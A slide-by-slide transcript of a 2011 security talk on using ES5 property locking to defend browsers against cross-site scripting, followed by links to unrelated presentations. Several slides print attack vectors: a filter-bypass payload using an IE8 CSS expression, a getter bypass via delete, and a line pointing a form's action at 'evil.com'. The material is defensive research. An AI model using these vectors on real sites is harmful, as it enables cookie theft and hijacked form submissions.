locking the throne room
play

Locking the Throne Room How ES5+ might change views on XSS and - PowerPoint PPT Presentation

Apr 21, 2023 •145 likes •550 views

Locking the Throne Room How ES5+ might change views on XSS and Client Side Security A presentation by Mario Heiderich, 2011 Introduction Mario Heiderich Researcher and PhD student at the Ruhr-University, Bochum Security Researcher

  1. Locking the Throne Room How ES5+ might change views on XSS and Client Side Security A presentation by Mario Heiderich, 2011

  2. Introduction  Mario Heiderich  Researcher and PhD student at the Ruhr-University, Bochum  Security Researcher for Microsoft, Redmond  Security Consultant for XING AG, Hamburg  Published author and international speaker  HTML5 Security Cheatsheet / H5SC  PHPIDS Project

  3. Today's menu  JavaScript and XSS  How it all began  A brief historical overview  Cross Site Scripting today  Current mitigation approaches  A peek into the petri dishes of current development  A different approach  ES5 and XSS  Case study and discussion  Future work

  4. JavaScript History  Developed by Brendan Eich as LiveScript  JavaScript 1.0 published late 1995 by Netscape  Microsoft developed the JScript dialect  ECMA-262 1 st Edition published in 1998  JavaScript 1.5/JScript 5.5 in November 2000  JavaScript 1.6 introducing E4X in late 2006  JavaScript 1.8 in 2008  JavaScript 1.8.5 in 2010, ECMA Script 5 compliance

  5. JavaScript and XSS  Cross Site Scripting  One site scripting another  Early vectors abusing Iframes  First published attacks in the late nineties  Three major variations  Reflected XSS  Persistent XSS  DOM based XSS / DOMXSS  Information theft and modification  Impersonation and leverage of more complex attacks

  6. The DOM  Document Object Model  Prototype based representation of HTML/XML trees  Interfaces for easy JavaScript access  Methods to read and manipulate DOM subtrees  Events to notice and process user interaction  Interaction with browser properties  Access to magic properties such as document location  Proprietary interfaces to  Crypto objects, browser components, style sheets, etc.

  7. XSS today  An ancient and simple yet unsolved problem  Complexity  Browser bugs  Insecure web applications  Browser plug-ins  Impedance mismatches  Application layer mitigation concepts  Risk assessment and ignorance  New features and spec drafts enabling 0-day attacks  XSS is a user agent problem! Nothing else!

  8. Mitigation History  Server side  Native runtime functions, strip_tags(), htmlentities(), etc.  Runtime libraries and request validation  External libraries filtering input and output  HTMLPurifier, AntiSamy, kses, AntiXSS, SafeHTML  HTTPOnly cookies  Client side protection mechanisms  toStaticHTML() in IE8+ and NoScript  IE8+ XSS filter and Webkit XSS Auditor  Protective extensions such as NoScript, NotScripts  Upcoming approaches such as CSP

  9. Impedance mismatch  Layer A is unaware of Layer B capabilities and flaws  Layer A deploys the attack  Layer B executes the exploit  Case study:  HTMLPurifier 4.1.1  Server side HTML filter and XSS mitigation library  Internet Explorer 8, CSS expressions and a parser bug  <a style="background:url('/\'\,! @x:expression\(write\(1\)\)//\)!\'');"></a>

  10. More Examples  Real World Attack Samples  Making websites vulnerable that aren't  Proving server side filters plain ineffective  Exploding XML Namespaces  Generating tags from dust  Exploiting CSS Escape decompilation  The backtick trick  VM →

  11. Further vectors  Plug-in based XSS  Adobe Reader  Java applets  Flash player  Quicktime videos  SVG images  Charset injection and content sniffing  UTF-7 XSS, EBCDIC, MacFarsi, XSS via images  Chameleon files, cross context scripting, local XSS  DOMXSS

  12. Quintessence  Server side filtering of client side attacks  Useful and stable for basic XSS protection  Still not remotely sufficient  Affected by charsets, impedance mismatch  Subverted by browser bugs an parser errors  Rendered useless by DOMXSS  Bypassed via plug-in based XSS  Helpless against attacks deployed from different servers  Not suitable for what XSS has become  The server cannot serve protection for the client

  13. Revisiting XSS  XSS attacks target the client  XSS attacks are being executed client side  XSS attacks aim for client side data and control  XSS attacks impersonate the user  XSS is a client side problem  Sometimes caused by server side vulnerabilities  Sometimes caused by a wide range of problems transparent for the server  Still we try to improve server side XSS filters

  14. Idea  Prevention against XSS in the DOM  Capability based DOM security  Inspired by HTTPOnly  Cookies cannot be read by scripts anymore  Why not changing document.cookie to do so  JavaScript up to 1.8.5 enabled this  Unfortunately Non-Standard  Example →

  15. __defineGetter__() <script> document. __defineGetter__ ('cookie', function(){ alert('no cookie access!'); return false; }); </script> … <script> alert(document.cookie) </script>

  16. Problems  Proprietary – not working in Internet Explorer  Loud – an attacker can fingerprint that modification  Not tamper resistant at all  JavaScript supplies a delete operator  Delete operations on DOM properties reset their state  Getter definitions can simply be overwritten  Object getters - invalid for DOM protection purposes  Same for setters and overwritten methods

  17. Bypass <script> document. __defineGetter__ ('cookie', function(){ alert('no cookie access!'); return false; }); </script> … <script> delete document.cookie; alert(document.cookie) </script>

  18. Tamper Resistance  First attempts down the prototype chain  document.__proto__.__defineGetter__()  Document.prototype  Components.lookupMethod(document, 'cookie')  Attempts to register delete event handlers  Getter and setter definitions for the prototypes  Setter protection for setters  Recursion problems  Interval based workarounds and race conditions  JavaScript 1.8 unsuitable for DOM based XSS protection

  19. ECMA Script 5  Most current browsers use JavaScript based on ES3  Firefox 3  Internet Explorer 8  Opera 11  Few modern ones already ship ES5 compliance  Google Chrome  Safari 5  Firefox 4  Internet Explorer 9

  20. Object Extensions  Many novelties in ECMA Script 5  Relevance for client side XSS mitigation  Object extensions such as  Object.freeze()  Object.seal()  Object.defineProperty() / Object.defineProperties()  Object.preventExtensions()  Less relevant but still interesting  Proxy Objects  More meta-programming APIs  Combinations with DOM Level 3 events

  21. ({}).defineProperty()  Object.defineProperty() and ..Properties()  Three parameters  Parent object  Child object to define  Descriptor literal  Descriptors allow to manipulate  Get / Set behavior  Value  “Enumerability”  “Writeability”  “Configurability”  Example →

  22. Example <script> Object. defineProperty (document, 'cookie', { get: function(){return:false}, set: function(){return:false}, configurable:false }); </script> … <script> delete document.cookie; alert(document.cookie); </script>

  23. configurable:false  Setting “configurability” to false is final  The object description is stronger than delete  Prototype deletion has to effect  Re-definition is not possible  Proprietary access via Components.lookupMethod() does not deliver the native object either  With this method call cookie access can be forbidden  By the developer  And by the attacker

  24. Prohibition  Regulating access in general  Interesting to prevent cookie theft  Other properties can be blocked too  Method access and calls can be forbidden  Methods can be changed completely  Horizontal log can be added to any call, access and event  That is for existing HTML elements as well  Example →

  25. Action Protection <script> var form = document.getElementById('form'); Object.defineProperty( form , 'action', { set: IDS_detectHijacking, get: IDS_detectStealing, configurable:false }); </script> … <script> document.forms[0].action='//evil.com'; </script>

  26. First Roundup  Access prohibition might be effective  Value and argument logging helps detecting attacks  Possible IDS solutions are not affected by heavy string obfuscation  No impedance mismatches  Attacks are detected on they layer they target  Parser errors do not have effect here  No effective charset obfuscations  Immune against plug-in-deployed scripting attacks  Automatic quasi-normalization

  27. Limitations  Blacklisting approach  Continuity issues  Breaking existing own JavaScript applications  Forbidding access is often too restrictive  Breaking third party JavaScript applications  Tracking scripts (Google Analytics, IVW, etc.)  Advertiser controlled scripts  Small adaption rate, high testing effort  No fine-grained or intelligent approach

  28. Going Further  No access prohibitions but RBAC via JavaScript  Possible simplified protocol  Let object A know about permitted accessors  Let accessors of object A be checked by the getter/setter  Let object A react depending on access validity  Seal object A  Execute application logic  Strict policy based approach  A shared secret between could strengthen the policy  Example →

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

TIME Room 1 Room 2 Room 3 Room 4 Room 5 Room 6 Room 1 Room 2 Room 3 Room 4 Room 5 Room

TIME Room 1 Room 2 Room 3 Room 4 Room 5 Room 6 Room 1 Room 2 Room 3 Room 4 Room 5 Room

Presentation Schedules (Updated on 03/12/2016. Subject to change. Kindly refer to the schedules on display at the ISCEE 2016 venue for updated versions, if any.) TIME Room 1 Room 2 Room 3 Room 4 Room 5 Room 6 Room 1 Room 2 Room 3 Room 4

625 views • 26 slides
Page 1 SESSION ROOM 201 ROOM 202 ROOM 203 ROOM 204 ROOM 204A ROOM 206 ROOM 207 ROOM 208

Page 1 SESSION ROOM 201 ROOM 202 ROOM 203 ROOM 204 ROOM 204A ROOM 206 ROOM 207 ROOM 208

2015 IOP Conference Presentation Schedule, v6 Page 1 SESSION ROOM 201 ROOM 202 ROOM 203 ROOM 204 ROOM 204A ROOM 206 ROOM 207 ROOM 208 SESSION A Marina Milner-Bolotin Annie Vallance Ashenafi Alemu

470 views • 3 slides
SESSION ROOM 201 ROOM 202 ROOM 203 ROOM 204 ROOM 204A ROOM 207 ROOM 208 SESSION A Susan

SESSION ROOM 201 ROOM 202 ROOM 203 ROOM 204 ROOM 204A ROOM 207 ROOM 208 SESSION A Susan

2016 IOP Conference Presentation Schedule, v1 Page 1 SESSION ROOM 201 ROOM 202 ROOM 203 ROOM 204 ROOM 204A ROOM 207 ROOM 208 SESSION A Susan Grossman Chantalle Fuchs Jovana Durica Natalie LeBlanc Sokyee A. Low Mashael Alharbi

315 views • 3 slides
Napoleon Bonaparte (1769 - 1821) &quot;On Judgement Day, before God's throne, There stood at

Napoleon Bonaparte (1769 - 1821) &quot;On Judgement Day, before God's throne, There stood at

Napoleon Bonaparte (1769 - 1821) &quot;On Judgement Day, before God's throne, There stood at last Napoleon, The Devil had his list-begun Of crime the Bonaparte had done. When God the Father, or God the Son Cut Satan short, before Gods throne!

794 views • 19 slides
CS533 Concepts of Operating Systems Linux Kernel Locking Techniques Intro to kernel locking

CS533 Concepts of Operating Systems Linux Kernel Locking Techniques Intro to kernel locking

CS533 Concepts of Operating Systems Linux Kernel Locking Techniques Intro to kernel locking techniques (Linux) Why do we need locking in the kernel? o Which problems are we trying to solve? What implementation choices do we have? o Is

407 views • 30 slides
LOCKING CS 2550 / Spring 2006 Principles of Database Systems 10 Locking Alexandros

LOCKING CS 2550 / Spring 2006 Principles of Database Systems 10 Locking Alexandros

LOCKING CS 2550 / Spring 2006 Principles of Database Systems 10 Locking Alexandros Labrinidis University of Pittsburgh 2 Alexandros Labrinidis, Univ. of Pittsburgh CS 2550 / Spring 2006 Centralized DBMS Locking T 1 T 2 T n

400 views • 10 slides
MICELT2014 SCHEDULE DAY 1 - SATURDAY, SEPTEMBER 13, 2014 Room 1 Room 2 Room 3 Room 4 Room 5

MICELT2014 SCHEDULE DAY 1 - SATURDAY, SEPTEMBER 13, 2014 Room 1 Room 2 Room 3 Room 4 Room 5

MICELT2014 SCHEDULE DAY 1 - SATURDAY, SEPTEMBER 13, 2014 Room 1 Room 2 Room 3 Room 4 Room 5 Fostering Critical Thinking Skills in Promotional strategies in Computer Exploring Content Schemata An Inspector Calls and The Correlation Between

120 views • 11 slides
Orthogonal key-value locking Goetz Graefe, Hideaki Kimura Hewlett-Packard Laboratories Palo Alto,

Orthogonal key-value locking Goetz Graefe, Hideaki Kimura Hewlett-Packard Laboratories Palo Alto,

Orthogonal key-value locking Goetz Graefe, Hideaki Kimura Hewlett-Packard Laboratories Palo Alto, Cal. Madison, Wis. ARIES/KVL What about non-key updates? February 27, 2015 Orthogonal key-value locking 8 ARIES/IM Data-only locking

337 views • 23 slides
Game and Learn: An Introduction to Educational Gaming 12. Case Study: Inform 7 Ruben R.

Game and Learn: An Introduction to Educational Gaming 12. Case Study: Inform 7 Ruben R.

Game and Learn: An Introduction to Educational Gaming 12. Case Study: Inform 7 Ruben R. Puentedura, Ph.D Playing Interactive Fiction ? ? ? ? ? ? Inform 7 The Healing of the King Design Throne Room Gift Room Sceptre Rattle King Elregg

391 views • 6 slides
Date: February 2, 2017 Room 1 (10024) Room 2 (10025) Room 3 (10026) Room 4 (10027) Room 5 (10028)

Date: February 2, 2017 Room 1 (10024) Room 2 (10025) Room 3 (10026) Room 4 (10027) Room 5 (10028)

Date: February 2, 2017 Room 1 (10024) Room 2 (10025) Room 3 (10026) Room 4 (10027) Room 5 (10028) Room 6 (10029) Time (Educational Administration) (Business &amp; Social (Linguistics &amp; (English Language (Culture &amp; Arts) (Teaching

579 views • 9 slides
Revelation 4:3, And He who sat there was like a jasper and a sardius stone in appearance; and

Revelation 4:3, And He who sat there was like a jasper and a sardius stone in appearance; and

Revelation 4:3, And He who sat there was like a jasper and a sardius stone in appearance; and there was a rainbow around the throne, in appearance like an emerald. Revelation 4:4, Around the throne Around the throne Revelation

227 views • 22 slides
H. Wilson Company This Is The Ultimate Presentation Cart! F u t u r e e h ! T o t n

H. Wilson Company This Is The Ultimate Presentation Cart! F u t u r e e h ! T o t n

WTPSSCE Model Sound Presentation 47 LBS. WPS4HDE MODEL FEATURES WEIGHT M.S.R.P. WPS80E Open Shelf $445.00 Casters! WPS81E One Locking Cabinet 56 LBS. $495.00 WPS82E Two Locking Cabinets 65 LBS. WPS4CE Duty 4 All Models This

328 views • 8 slides
Owen S. Hofmann, Xuan Wang, Emmett Witchel, Donald E. Porter 1 Fine-grained locking -

Owen S. Hofmann, Xuan Wang, Emmett Witchel, Donald E. Porter 1 Fine-grained locking -

Sangman Kim , Michael Z. Lee, Alan M. Dunn, Owen S. Hofmann, Xuan Wang, Emmett Witchel, Donald E. Porter 1 Fine-grained locking - Bug-prone, hard to maintain Parallelism - OS provides poor support Coarse-grained locking - Reduced

536 views • 34 slides
blocking synchronization Yang Xu Outline Disadvantages of locking Hardware support for

blocking synchronization Yang Xu Outline Disadvantages of locking Hardware support for

Atomic variables and non- blocking synchronization Yang Xu Outline Disadvantages of locking Hardware support for concurrency Atomic variable classes Non-blocking algorithms Disadvantages of locking A lot of overhead

414 views • 13 slides
Presentation Schedules DAY 1 1 DECEMBER 2015 (TUESDAY) Room 1 Room 2 Room 3 Room 4 Time

Presentation Schedules DAY 1 1 DECEMBER 2015 (TUESDAY) Room 1 Room 2 Room 3 Room 4 Time

Presentation Schedules DAY 1 1 DECEMBER 2015 (TUESDAY) Room 1 Room 2 Room 3 Room 4 Time Day-1 : 1 Dec 2015 9.00 AM KEYNOTE ADDRESSES AND OPENING CEREMONY 12.45 PM LUNCHEON 2.00 PM 0520 1340 2000 0970 2.15 PM 1260 0550 1380 0470

401 views • 22 slides
Higher Level Synchronization 9A. Practical Problems locking and waiting Operating Systems

Higher Level Synchronization 9A. Practical Problems locking and waiting Operating Systems

4/24/2016 Higher Level Synchronization 9A. Practical Problems locking and waiting Operating Systems Principles 9B. Semaphores and Condition Variables 9C. File Level Locking Higher Level Synchronization 9D. Bottlenecks, Contention and

206 views • 7 slides
Writing Secure Code Wash all user-submitted data Vulnerabilities XSS - Cross-site scripting

Writing Secure Code Wash all user-submitted data Vulnerabilities XSS - Cross-site scripting

Writing Secure Code Wash all user-submitted data Vulnerabilities XSS - Cross-site scripting Executing unauthorized code XSRF - Cross-site request forgery Remote execution for logged-in users SQL Injection A malicious variable placed into a

681 views • 18 slides
Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji

Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji

Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji Prateek Saxena Dawn Song Illinois Institute UC Berkeley UC Berkeley Of Technology 1 A Cross-Site Scripting Attack Hi Joe, &lt;img src=&gt;

569 views • 42 slides
Browser Security Part 1 Background Web Server Browser Serves content Represents content

Browser Security Part 1 Background Web Server Browser Serves content Represents content

Browser Security Part 1 Background Web Server Browser Serves content Represents content Static Static (HTML) Dynamic Dynamic (XML, ASP, JSP) Server-side scripts Client-side scripts (JScript) Fetch content from

621 views • 24 slides
WEB CLIENT SECURITY Riccardo Bonafede Daniele Lain spritzers - CTF team Leonardo Nodari

WEB CLIENT SECURITY Riccardo Bonafede Daniele Lain spritzers - CTF team Leonardo Nodari

WEB CLIENT SECURITY Riccardo Bonafede Daniele Lain spritzers - CTF team Leonardo Nodari spritz.math.unipd.it/spritzers.html Disclaimer All information presented here has the only purpose to teach how vulnerabilities work. Use them to win

482 views • 30 slides
VOTD: XSS &amp; CSRF Engineering Secure Software Last Revised: September 8, 2020 SWEN-331:

VOTD: XSS &amp; CSRF Engineering Secure Software Last Revised: September 8, 2020 SWEN-331:

VOTD: XSS &amp; CSRF Engineering Secure Software Last Revised: September 8, 2020 SWEN-331: Engineering Secure Software Benjamin S Meyers 1 What is XSS? XSS: Cross Site Scripting Injecting malicious scripts into a web page CWE-79

772 views • 12 slides
Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall

Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall

Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Documents Browser's fundamental role is to display documents comprised of - HTML - JavaScript - Style

1.67k views • 129 slides
Web Security Thierry Sans Securing the web architecture means securing ... The network

Web Security Thierry Sans Securing the web architecture means securing ... The network

Web Security Thierry Sans Securing the web architecture means securing ... The network The operating system The web server ( Apache for instance) The administration server ( SSH for instance) The database ( Oracle for instance)

1.37k views • 61 slides
eb Security Software Studio yslin@DataLAB 1 Common Security Risks Brute-Force Attacks

eb Security Software Studio yslin@DataLAB 1 Common Security Risks Brute-Force Attacks

eb Security Software Studio yslin@DataLAB 1 Common Security Risks Brute-Force Attacks SQL Injections Cross-Site Scripting (XSS) Cross-Site Request Forgery (CSRF) 2 Common Security Risks Brute-Force Attacks SQL

1.66k views • 141 slides

More recommend